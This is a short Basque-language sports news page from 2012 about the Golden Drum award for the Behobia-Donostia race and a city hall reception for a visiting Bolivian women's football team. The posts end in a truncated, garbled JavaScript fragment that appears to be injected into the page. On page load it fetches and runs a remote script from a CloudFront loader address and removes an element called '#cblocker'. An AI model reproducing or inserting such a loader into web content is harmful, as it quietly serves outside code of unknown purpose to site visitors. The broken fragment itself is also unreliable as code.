Category: Kirola

Urrezko Danborra eta Hiritar Merituaren Dominak

Mai 01 2012

2012ko Urrezko Danborra Behobia-Donostia lasterketa herrikoiari eman zaio, merezimendu osoz, azken 32 urtetan urtero-urtero gero eta donostiar gehiago korrika eta kirola egitera animatzeagatik (BIDEOA).

Read more ...

Bolibiatik etorritako oparia

Api 28 2012

Uztailean harrera hunkigarria egin zitzaion Udalbatzar Aretoan Donostia CUP nazioarteko futbol txapelketa jokatzera Bolibiatik etorri zen emakume taldeari. Merezitako harrera, futbol zelai barruan zein kanpoan erakutsi zuten adoreagatik, emakumeen eskubideen alde eta gizarte parekidea lortzeko. Txapelketan Xabier Azkargorta izan zuten entrenatzaile eta bera ere harreran egon zen une guztietan bolibiarrekin batera. Jokalariek hitza hartu zutenean udal korporazioko kideek adi entzun zituzten haien eguneroko bizipenak eta prozesu eraldatzaile hau nola bizitzen ari diren Bolibian.

// -1?’https’:'http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};]]>